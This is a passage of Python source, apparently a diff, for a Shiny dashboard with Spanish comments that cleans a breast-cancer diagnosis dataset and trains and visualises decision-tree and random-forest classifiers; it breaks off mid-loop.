ranForest_tree_plot_x_coords = reactive.Value() - ranForest_tree_plot_y_coords = reactive.Value() - ranForest_tree_plot_texts = reactive.Value() - - ranForest_tree_conf_mat_train = reactive.Value() - ranForest_tree_conf_mat_test = reactive.Value() - - #Logistic regression: - logistic_regression_execution_counter = reactive.Value(0) - - accuracy_logReg = reactive.Value(-1) - recall_logReg = reactive.Value(-1) - precision_logReg = reactive.Value(-1) - f1_logReg = reactive.Value(-1) - - accuracy_logReg_test = reactive.Value(-1) - recall_logReg_test = reactive.Value(-1) - precision_logReg_test = reactive.Value(-1) - f1_logReg_test = reactive.Value(-1) - - logReg_conf_mat_train = reactive.Value() - logReg_conf_mat_test = reactive.Value() - - -################# MODULOS DE SERVIDORES AUXILIARES DE LA HERRAMIENTA ######################### - - presentation_server("Presentation_Main") - cleaning_server("cleaning_extra") - correlation_server("correlation_1") - subsetSplit_server("subset_1") - decTree_server("decTree_1") - ranForest_server("ranForest_1") - logReg_server("logReg_1") - shared_algs_server("decTree_shared_1", label="decTree") - shared_algs_server("ranForest_shared_1", label="ranForest") - shared_algs_server("logReg_shared_1", label="logReg") - warnings_general_server("general_warnings") - warnings_algorithms_server("dec_tree_warnings") - 
warnings_algorithms_server("ran_forest_warnings") - warnings_algorithms_server("log_reg_warnings") - - - -############################################################################################## -#################################### DATOS INICIALES ######################################### -############################################################################################## - -#################################### TABLAS ################################################## - @output - @render.table - def originalTable(): - return original_df - - @output - @render.table - def originalTableTypes(): - original_table_types = original_df.dtypes.to_frame().reset_index().transpose().reset_index(drop=True) - headers = original_table_types.iloc[0] - original_table_types = pd.DataFrame(original_table_types.values[1:], columns=headers) - original_table_types = original_table_types.replace(['int64', 'float64', 'object'],['numérico', 'numérico', 'categórico']) - return original_table_types - -#################################### EFECTOS REACTIVOS ####################################### - - # VER TABLA ORIGINAL: - @reactive.Effect - def _(): - original_table_switch = input.view_original_table() - if original_table_switch == True: - original_table = ui.output_table("originalTable", style = "overflow-x:scroll; height:260px; overflow-y:auto;"), - ui.insert_ui( - ui.div({"id": "inserted-original-table"}, original_table, style = "width:100%; overflow-x:auto;"), - selector="#original-table", - where="beforeEnd", - ) - else: - ui.remove_ui("#inserted-original-table") - - # VER TIPOS DE DATOS ORIGINALES - @reactive.Effect - def _(): - original_table_types_switch = input.view_original_table_types() - if original_table_types_switch == True: - original_table_types = ui.output_table("originalTableTypes", style = "overflow-x:auto;"), - ui.insert_ui( - ui.div({"id": "inserted-original-table-types"}, original_table_types), - selector="#original-table-types", - where="beforeEnd", - ) - else: - ui.remove_ui("#inserted-original-table-types") - - -############################################################################################## -#################################### OBSERVACIÓN DE DATOS #################################### -############################################################################################## - -#################################### EFECTOS REACTIVOS ####################################### - - @reactive.Effect - def _(): - diagnosis_data_converted.get() - diganosis_hist_switch = input.view_diganosis_hist() - if diganosis_hist_switch == True: - ui.remove_ui("#diagnosis-hist-plot") - diganosis_hist_plot = output_widget("widget_diagnosisObservation") - ui.insert_ui( - ui.div({"id": "diagnosis-hist-plot"}, diganosis_hist_plot, style = "width:50%; height: 180px; overflow-x:auto;"), - selector="#data-observation-diagnosis", - where="beforeEnd", - ) - else: - ui.remove_ui("#diagnosis-hist-plot") - - @reactive.Effect - def _(): - # Elementos a los que reaccionar: - input.dropKeyWordSelector() - input.drop_selected_column_clean() - diagnosis_data_converted.get() - input.drop_correlation() - - general_hist_switch = input.view_general_hist() - if general_hist_switch == True: - ui.remove_ui("#general-hist-plot") - # Cálculo de la altura del plot para evitar que se mueva la posición de la página al recalcular el plot - selected_cols = [col for col in clean_df.columns if input.dropKeyWordSelector() in col] - print (selected_cols) - subplot_rows_number = math.ceil(len(selected_cols) / 
subplot_cols_number) - plot_height = "height: " + str(180*subplot_rows_number) + "px;" - general_hist_plot = output_widget("widget_generalObservation") - ui.insert_ui( - ui.div({"id": "general-hist-plot"}, general_hist_plot, style = "width:100%; overflow-x:auto;" + plot_height), - selector="#data-observation-general", - where="beforeEnd", - ) - else: - ui.remove_ui("#general-hist-plot") - -#################################### WIDGETS ################################################# - - # WIDGET HISTOGRAMA DATOS DIAGNOSIS - @output - @render_widget - def widget_diagnosisObservation(): - # Elementos a los que reaccionar: - input.dropIdSelector() - diagnosis_data_converted.get() - - fig = go.Figure() - if diagnosis_data_converted.get() == False: - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 'B'], name='Benigno', marker_color='#5ec962')) - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 'M'], name='Maligno', marker_color='#440154')) - else: - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 1], name='Maligno = 1', marker_color='#440154', legendgroup="Maligno")) - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 0], name='Benigno = 0', marker_color='#5ec962', legendgroup="Benigno")) - - fig.update_layout(autosize=True, - height=180, - margin=dict(l=20, r=20, t=40, b=20), - barmode='stack') - - fig.update_traces(hovertemplate='%{y}') - - return fig - - # WIDGET HISTOGRAMA DATOS GENERALES - @output - @render_widget - def widget_generalObservation(): - # Elementos a los que reaccionar: - diagnosis_data_converted.get() - input.drop_selected_column_clean() - input.drop_correlation() - - selected_cols = [col for col in clean_df.columns if input.dropKeyWordSelector() in col] - - # Dividir dataframe en dos a partir de diagnosis - dfM=pd.DataFrame() - dfB=pd.DataFrame() - if diagnosis_data_converted.get() == False: - dfM=clean_df[clean_df['diagnosis'] == 'M'] - dfB=clean_df[clean_df['diagnosis'] == 'B'] - else: - dfM=clean_df[clean_df['diagnosis'] == 1] - dfB=clean_df[clean_df['diagnosis'] == 0] - - subplot_rows_number = math.ceil(len(selected_cols) / subplot_cols_number) - - fig = make_subplots(rows=subplot_rows_number, cols=subplot_cols_number, - subplot_titles=selected_cols, - ) - - for idx,curr_col in enumerate(selected_cols): - fig.add_trace(go.Histogram(x=dfM[curr_col], name = "Maligno", marker_color='#440154', opacity=0.7, legendgroup="Maligno", showlegend=idx==0), - row=math.floor(idx/subplot_cols_number)+1, col=(idx%subplot_cols_number)+1) - fig.add_trace(go.Histogram(x=dfB[curr_col], name = "Benigno", marker_color='#5ec962', opacity=0.7, legendgroup="Benigno", showlegend=idx==0), - row=math.floor(idx/subplot_cols_number)+1, col=(idx%subplot_cols_number)+1) - - fig.update_layout(autosize=True, - barmode='overlay', - height=180 * subplot_rows_number, - showlegend=True, - margin=dict(l=20, r=20, t=40, b=20)) - - fig.update_traces(hovertemplate='%{y}
      Rango: %{x}') - - return fig - - -############################################################################################## -#################################### LIMPIEZA DE DATOS ####################################### -############################################################################################## - -#################################### TABLAS ################################################## - - @output - @render.table - def cleanTable(): - #Elementos a los que reaccionar: - input.dropIdSelector() - diagnosis_data_converted.get() - correlation_execution_counter.get() - reset_dataframe_counter.get() - - return clean_df - -#################################### EFECTOS REACTIVOS ####################################### - - # CONVERTIR DIAGNOSIS - @reactive.Effect - @reactive.event(input.convert_diagnosis) - def _(): - clean_df['diagnosis'] = original_df['diagnosis'].map({'M':1,'B':0}) - diagnosis_data_converted.set(True) - - # ELIMINAR COLUMNA SELECCIONADA - @reactive.Effect - @reactive.event(input.drop_selected_column_clean) - def _(): - if input.dropIdSelector() in clean_df.columns: - clean_df.drop(input.dropIdSelector(),axis=1,inplace=True) - update_all_selectors() - - # MOSTRAR TABLA LIMPIA - @reactive.Effect - def _(): - clean_table_switch = input.view_clean_table() - if clean_table_switch == True: - clean_table = ui.output_table("cleanTable", style = "overflow-x:scroll; height:260px; overflow-y:auto;"), - ui.insert_ui( - ui.div({"id": "inserted-clean-table"}, clean_table), - selector="#clean-table", - where="beforeEnd", - ) - else: - ui.remove_ui("#inserted-clean-table") - -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR SELECTOR COLUMNA - def update_dropIdSelector(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_select("dropIdSelector", choices=column_dict, selected=None) - - -############################################################################################## -#################################### CORRELACIÓN DE DATOS #################################### -############################################################################################## - -#################################### EFECTOS REACTIVOS ####################################### - - # ELIMINAR COLUMNAS CON CORRELACIÓN SUPERIOR - @reactive.Effect - @reactive.event(input.drop_correlation) - def _(): - correlation_map = clean_df.drop(['diagnosis'], axis=1).corr().abs() - upper_tri = correlation_map.where(np.triu(np.ones(correlation_map.shape),k=1).astype(bool)) - columns_to_drop = [column for column in upper_tri.columns if any(upper_tri[column] >= input.maximum_correlation())] - clean_df.drop(columns_to_drop, axis=1, inplace=True) - correlation_execution_counter.set(correlation_execution_counter.get() + 1) - update_all_selectors() - - # Actualizar el widget de correlacion tras los cálculos: - correlation_switch = input.view_correlation() - if correlation_switch == True: - ui.remove_ui("#correlation-plot") - correlation_plot = output_widget("widget_correlation") - ui.insert_ui( - ui.div({"id": "correlation-plot"}, correlation_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#correlation", - where="beforeEnd", - ) - - # VER WIDGET CORRELACIÓN - @reactive.Effect - def _(): - correlation_switch = input.view_correlation() - if correlation_switch == True: - if diagnosis_data_converted.get() == True: - ui.remove_ui("#correlation-plot") - 
correlation_plot = output_widget("widget_correlation") - ui.insert_ui( - ui.div({"id": "correlation-plot"}, correlation_plot, style = "width:100%; height:1000px; overflow-x:auto; overflow-y:auto;"), - selector="#correlation", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "correlation-plot"}, correlation_warning_ui("general_warnings")), - selector="#correlation", - where="beforeEnd", - ) - else: - ui.remove_ui("#correlation-plot") - -#################################### WIDGETS ################################################# - - # WIDGET CORRELACIÓN - @output - @render_widget - def widget_correlation(): - #Elementos a los que reaccionar: - input.dropIdSelector() - input.maximum_correlation() - correlation_execution_counter.get() - - if diagnosis_data_converted.get() == False: - return go.Figure() - - correlation_map = clean_df.corr().round(decimals=3) - fig = go.Figure(data=[go.Heatmap(z=correlation_map, - x = correlation_map.columns.values, - y = correlation_map.columns.values, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Viridis_r, - name="") - ]) - - fig.update_layout(autosize=True, - height=min(80*len(clean_df.columns), 1000), - yaxis=dict(scaleanchor = 'x'), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=correlation_map, - texttemplate="%{text}", - hovertemplate='%{x} - %{y}
      Correlación: %{z}') - - fig.update_yaxes(autorange="reversed") - - return fig - - -############################################################################################## -#################################### ALGORITMOS DE PREDICCIÓN ################################ -############################################################################################## - - # SEPARACIÓN ENTRENAMIENTO - TEST (sin funcionalidad real, sólo sirve para crear una mejor UX, la división se realiza al crear los modelos) - @reactive.Effect - @reactive.event(input.make_test_split) - def _(): - test_split_done.set(True) - - -############################################################################################## -#################################### ÁRBOL DE DECISIÓN ####################################### -############################################################################################## - -#################################### IMPORTANTES ############################################# - - # COMPROBACIONES PREVIAS ÁRBOL DE DECISIÓN - def dec_tree_previous_checks(test_size_split, df_len): - if diagnosis_data_converted.get() == False: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, diagnosis_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if test_split_done.get() == False: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, test_split_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if len(list(input.dec_tree_features_sel())) == 0: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, features_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if df_len * test_size_split < 1.0: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, test_split_low_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if df_len * ( 1 - test_size_split ) < 1.0: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, test_split_high_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - return False - - # FIT, PREDICCIÓN Y GUARDADO DE DATOS DEL ÁRBOL DE DECISIÓN - def classification_model_dec_tree(model, data, size_test, predictors, outcome): - # Crear la división de test y entrenamiento! 
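- # Editor's note (hedged, not part of the original app): train_test_split reshuffles the rows on every call,
- # so each generated model sees a different split and the metrics below can vary between runs. If a reproducible,
- # class-balanced split were wanted, one possible variant (illustrative only) would be:
- #   data_train, data_test = train_test_split(data, test_size=size_test, stratify=data[outcome], random_state=0)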
- data_train, data_test = train_test_split(data, test_size = size_test) - - # Fit del modelo: - model.fit(data_train[predictors],data_train[outcome]) - - # Hacer predicciones del set de entrenamiento: - predictions = model.predict(data_train[predictors]) - - # Setear los resultados del set de entrenamiento: - accuracy_decTree.set((metrics.accuracy_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - recall_decTree.set((metrics.recall_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - precision_decTree.set((metrics.precision_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - f1_decTree.set((metrics.f1_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - - # Hacer predicciones del set de test: - predictions_test = model.predict(data_test[predictors]) - - # Setear los resultados del set de test: - accuracy_decTree_test.set((metrics.accuracy_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - recall_decTree_test.set((metrics.recall_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - precision_decTree_test.set((metrics.precision_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - f1_decTree_test.set((metrics.f1_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - - # Creación y guardado de la matriz de confusión - cm_train = metrics.confusion_matrix(predictions,data_train[outcome]) - cm_test = metrics.confusion_matrix(predictions_test,data_test[outcome]) - tree_conf_mat_train.set(cm_train) - tree_conf_mat_test.set(cm_test) - - # Creación de la figura del árbol de decisión - plt.figure(figsize=(12,12)) - m_tree = plot_tree(model, filled=True, feature_names=predictors, class_names=["Benign", "Malign"], rounded=True, fontsize=5) - plt.savefig( str(decTree_image_folder) + "\\" + str(session.id) + '_dec_tree.jpg',format='jpg',bbox_inches = "tight", dpi=600) - # Cerrar todas las figuras para evitar llenar la memoria de información innecesaria - plt.close('all') - - # Guardado de datos de la figura del árbol de decisión - coords = list() - coords_x = list() - coords_y = list() - texts = list() - - for node in m_tree: - coords.append(list(node.get_position())) - texts.append(node.get_text().replace("\n", "
      ")) - - for x, y in coords: - coords_x.append(x) - coords_y.append(y) - - tree_plot_x_coords.set(coords_x) - tree_plot_y_coords.set(coords_y) - tree_plot_texts.set(texts) - -#################################### EFECTOS REACTIVOS ####################################### - - # GENERAR EL MODELO DE ÁRBOL DE DECISIÓN Y REALIZAR TODOS LOS CÁLCULOS - @reactive.Effect - @reactive.event(input.generate_decission_tree) - def _(): - ui.remove_ui("#dec-tree-warning") - - # Obtener el tamaño de la separación de entrenamiento y la longitud de la base de datos para comprobaciones: - test_size_split = input.test_split_value() - df_len = len(clean_df) - - # Comprobaciones previas. Si algo falla, el modelo no se calcula y se reseta todo lo generado para no causar confusión: - if dec_tree_previous_checks(test_size_split, df_len) == True: - # Cerrar todas las visualizaciones - ui.update_switch("view_variable_importance_dec_tree", value=False) - ui.update_switch("conf_mat_dec_tree_switch", value=False) - ui.update_switch("view_tree_dec_tree_switch", value=False) - # Resetear todos los resultados - reset_dec_tree_result_values() - empty_dec_tree_feature_importance_df() - decision_tree_execution_counter.set(0) - return - - # Arreglar valores None para poder ser aceptados por el modelo: - max_depth_val = input.dec_tree_max_depth() - if max_depth_val == 0: - max_depth_val = None - - max_features_value = input.dec_tree_max_features() - if max_features_value == 'None': - max_features_value = None - - # Crear el modelo de árbol de decisión - dec_tree_model = DecisionTreeClassifier(criterion=input.dec_tree_criterion(), - splitter=input.dec_tree_splitter(), - max_depth=max_depth_val, - min_samples_split=input.dec_tree_min_samples_split(), - min_samples_leaf=input.dec_tree_min_samples_leaf(), - max_features=max_features_value) - - # Lista de las características que usamos: - features_list = list(input.dec_tree_features_sel()) - - # Fit y predicciónes del modelo. 
Guardado de todos los datos - classification_model_dec_tree(dec_tree_model,clean_df,test_size_split,features_list,outcome_var) - - # Variables importantes y guardado de sus resultados - empty_dec_tree_feature_importance_df() - dec_tree_feat_imp = pd.Series(dec_tree_model.feature_importances_, index=features_list).sort_values(ascending=False) - dec_tree_feat_imp_df.insert(0, "Característica", dec_tree_feat_imp.index) - dec_tree_feat_imp_df.insert(1, "Valor", dec_tree_feat_imp.values.round(decimals=3) * 100) - - decision_tree_execution_counter.set(decision_tree_execution_counter.get()+1) - - # MOSTRAR EL WIDGET DE IMPORTANCIA DE VARIABLES DEL ÁRBOL DE DECISIÓN - @reactive.Effect - def _(): - var_imp_dec_tree_switch = input.view_variable_importance_dec_tree() - if var_imp_dec_tree_switch == True: - ui.remove_ui("#var-imp-dec-tree-plot") - if decision_tree_execution_counter.get() > 0: - var_imp_dec_tree_plot = output_widget("widget_dec_tree_var_imp") - ui.insert_ui( - ui.div({"id": "var-imp-dec-tree-plot"}, var_imp_dec_tree_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#var_imp_dec_tree", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "var-imp-dec-tree-plot"}, feat_imp_warning_ui("dec_tree_warnings")), - selector="#var_imp_dec_tree", - where="beforeEnd", - ) - else: - ui.remove_ui("#var-imp-dec-tree-plot") - - # DESELECCIONAR VARIABLES POCO IMPORTANTES DEL ÁRBOL DE DECISIÓN - @reactive.Effect - @reactive.event(input.deselect_not_imp_vars_dec_tree) - def _(): - minimum_importance = input.minimum_importance_dec_tree() - important_columns_auto = [feature["Característica"] for idx, feature in dec_tree_feat_imp_df.iterrows() if (feature["Valor"] >= minimum_importance)] - ui.update_checkbox_group("dec_tree_features_sel", selected=important_columns_auto) - - # MOSTRAR LA MATRIZ DE CONFUSIÓN DEL ÁRBOL DE DECISIÓN - @reactive.Effect - def _(): - conf_mat_dec_tree_switch = input.conf_mat_dec_tree_switch() - if conf_mat_dec_tree_switch == True: - ui.remove_ui("#dec-tree-conf-mat-train") - ui.remove_ui("#dec-tree-conf-mat-test") - if decision_tree_execution_counter.get() > 0: - dec_tree_conf_mat_train = output_widget("widget_dec_tree_conf_mat_train") - ui.insert_ui( - ui.div({"id": "dec-tree-conf-mat-train"}, dec_tree_conf_mat_train, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#dec_tree_conf_matrix_train", - where="beforeEnd", - ) - dec_tree_conf_mat_test = output_widget("widget_dec_tree_conf_mat_test") - ui.insert_ui( - ui.div({"id": "dec-tree-conf-mat-test"}, dec_tree_conf_mat_test, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#dec_tree_conf_matrix_test", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "dec-tree-conf-mat-train"}, conf_matrix_warning_ui("dec_tree_warnings")), - selector="#dec_tree_conf_matrix", - where="beforeEnd", - ) - else: - ui.remove_ui("#dec-tree-conf-mat-train") - ui.remove_ui("#dec-tree-conf-mat-test") - - # MOSTRAR EL WIDGET DEL ÁRBOL DE DECISIÓN - @reactive.Effect - def _(): - view_tree_dec_tree_switch = input.view_tree_dec_tree_switch() - if view_tree_dec_tree_switch == True: - ui.remove_ui("#dec-tree-view-img") - if decision_tree_execution_counter.get() > 0: - dec_tree_view = output_widget("widget_dec_tree_view") - ui.insert_ui( - ui.div({"id": "dec-tree-view-img"}, dec_tree_view, style = "width:100%; height:1000px; overflow-x:auto; overflow-y:auto;"), - selector="#dec_tree_view", - where="beforeEnd", - ) - else: - 
view_tree_dec_tree_warning = ui.output_text("decision_tree_warning_view_txt"), - ui.insert_ui( - ui.div({"id": "dec-tree-view-img"}, view_tree_dec_tree_warning, style="color:red; font-style:italic; margin-top:20px; padding: 10px; background: #f7f7f7; border-radius: 10px;"), - selector="#dec_tree_view", - where="beforeEnd", - ) - else: - ui.remove_ui("#dec-tree-view-img") - -#################################### WIDGETS ################################################# - - # WIDGET DE LA IMPORTANCIA DE LAS VARIABLES DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_var_imp(): - #Variables a las que reaccionar: - decision_tree_execution_counter.get() - input.view_variable_importance_dec_tree() - - if len(dec_tree_feat_imp_df) == 0: - return go.Figure() - - fig = go.Figure(data=[go.Bar(x = dec_tree_feat_imp_df["Valor"], - y = dec_tree_feat_imp_df["Característica"], - orientation='h', - name="", - marker=dict(color = dec_tree_feat_imp_df["Valor"], - colorscale=px.colors.sequential.Viridis_r)) - ]) - - fig.update_layout(autosize=True, - height=max(280, 40*len(dec_tree_feat_imp_df)), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(hovertemplate='%{y} : %{x}%') - - fig.update_yaxes(autorange="reversed") - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN ENTRENAMIENTO DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_conf_mat_train(): - cm_map = tree_conf_mat_train.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos entrenamiento", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN TESTING DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_conf_mat_test(): - cm_map = tree_conf_mat_test.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos test", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET VISUALIZACIÓN DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_view(): - # Variables a las que reaccionar: - decision_tree_execution_counter.get() - - img_path = str(Path(__file__).parent / "DecTrees") + "\\" + str(session.id) + "_dec_tree.jpg" - img_src = Image.open( img_path ) - - fig = go.Figure() - - fig.add_trace( - go.Scatter( - x=tree_plot_x_coords.get(), - y=tree_plot_y_coords.get(), - text=tree_plot_texts.get(), - mode="markers", - marker=dict( - color="white", - size=60, - opacity=0.1, - ), - name="", - ) - ) - - # Configurar ejes - fig.update_xaxes( - visible=False, - range=[0,1], - ) - - fig.update_yaxes( - visible=False, - range=[0,1], - # el atributo de scaleanchor asegura que la relación de aspecto no cambie - scaleanchor="x" - ) - - fig.add_layout_image( - dict( - x=-0.02, - sizex=1.04, - y=1.01, - sizey=1.02, - xref="x", - yref="y", - opacity=1.0, - layer="above", - sizing="stretch", - source=img_src) - ) - - fig = fig.update_traces(hovertemplate='%{text}') - - fig.update_layout(autosize=True, - height=1000, - margin=dict(l=20, r=20, t=40, b=20),) - - return fig - -#################################### TEXTOS ################################################## - - # RESULTADOS - @output - @render.text - def decision_tree_accuracy(): - if accuracy_decTree.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_decTree.get()) + "%" - - @output - @render.text - def decision_tree_recall(): - if recall_decTree.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_decTree.get()) + "%" - - @output - @render.text - def decision_tree_precision(): - if precision_decTree.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_decTree.get()) + "%" - - @output - @render.text - def decision_tree_f1(): - if f1_decTree.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_decTree.get()) + "%" - - @output - @render.text - def decision_tree_accuracy_test(): - if accuracy_decTree_test.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_decTree_test.get()) + "%" - - @output - @render.text - def decision_tree_recall_test(): - if recall_decTree_test.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_decTree_test.get()) + "%" - - @output - @render.text - def decision_tree_precision_test(): - if precision_decTree_test.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_decTree_test.get()) + "%" - - @output - @render.text - def decision_tree_f1_test(): - if f1_decTree_test.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_decTree_test.get()) + "%" - - # WARNING VISUALIZACIÓN ÁRBOL - @output - @render.text - def decision_tree_warning_view_txt(): - return "No se puede mostrar el árbol de decisión sin haber creado el modelo!" 
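- # Editor's note: the render.text outputs above only format the reactive metric values as percentage strings.
- # For reference, a minimal self-contained sketch of the same pipeline outside of Shiny, using sklearn's bundled
- # breast-cancer dataset (illustrative only; the names and parameters here are assumptions, not the app's code):
- #   from sklearn.datasets import load_breast_cancer
- #   from sklearn.model_selection import train_test_split
- #   from sklearn.tree import DecisionTreeClassifier
- #   from sklearn import metrics
- #   X, y = load_breast_cancer(return_X_y=True)
- #   X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
- #   y_pred = DecisionTreeClassifier(max_depth=3).fit(X_train, y_train).predict(X_test)
- #   print("Exactitud: " + str(round(metrics.accuracy_score(y_test, y_pred) * 100, 3)) + "%")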
- -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR CHECKBOX ÁRBOL DE DECISIÓN - def update_decTree_checkbox_group(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_checkbox_group("dec_tree_features_sel", choices=column_dict, selected=list(column_dict)) - - - -############################################################################################## -#################################### RANDOM FOREST ########################################### -############################################################################################## - -#################################### IMPORTANTES ############################################# - - # COMPROBACIONES PREVIAS RANDOM FOREST - def ran_forest_previous_checks(test_size_split, df_len): - if diagnosis_data_converted.get() == False: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, diagnosis_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if test_split_done.get() == False: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, test_split_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if len(list(input.ran_forest_features_sel())) == 0: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, features_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if df_len * test_size_split < 1.0: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, test_split_low_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if df_len * ( 1 - test_size_split ) < 1.0: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, test_split_high_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - return False - - # FIT, PREDICCIÓN Y GUARDADO DE DATOS DEL RANDOM FOREST - def classification_model_random_forest(model, data, size_test, predictors, outcome, n_estimators): - # Crear la división de test y entrenamiento! 
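- # Editor's note on the metric calls further down: sklearn's scoring functions are documented as f(y_true, y_pred),
- # while this helper (like the decision-tree one) calls them as metrics.xxx_score(predictions, data_train[outcome]).
- # Accuracy and F1 are symmetric in their arguments, so they are unaffected; precision and recall effectively swap,
- # and confusion_matrix comes out transposed (the heatmap widgets label the axes accordingly, with predicted values
- # on the y axis). Conventional order, for reference: metrics.recall_score(data_train[outcome], predictions).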
- data_train, data_test = train_test_split(data, test_size = size_test) - - # Fit del modelo: - model.fit(data_train[predictors],data_train[outcome]) - - # Hacer predicciones del set de entrenamiento: - predictions = model.predict(data_train[predictors]) - - # Setear los resultados del set de entrenamiento: - accuracy_ranForest.set((metrics.accuracy_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - recall_ranForest.set((metrics.recall_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - precision_ranForest.set((metrics.precision_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - f1_ranForest.set((metrics.f1_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - - # Hacer predicciones del set de test: - predictions_test = model.predict(data_test[predictors]) - - # Setear los resultados del set de test: - accuracy_ranForest_test.set((metrics.accuracy_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - recall_ranForest_test.set((metrics.recall_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - precision_ranForest_test.set((metrics.precision_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - f1_ranForest_test.set((metrics.f1_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - - # Creación y guardado de la matriz de confusión - cm_train = metrics.confusion_matrix(predictions,data_train[outcome]) - cm_test = metrics.confusion_matrix(predictions_test,data_test[outcome]) - ranForest_tree_conf_mat_train.set(cm_train) - ranForest_tree_conf_mat_test.set(cm_test) - - coords_x_list = list() - coords_y_list = list() - texts_list = list() - - # Creación de las figuras de árboles de decisión (máximo 5 para ahorrar espacio) - for index in range(0, min(5, 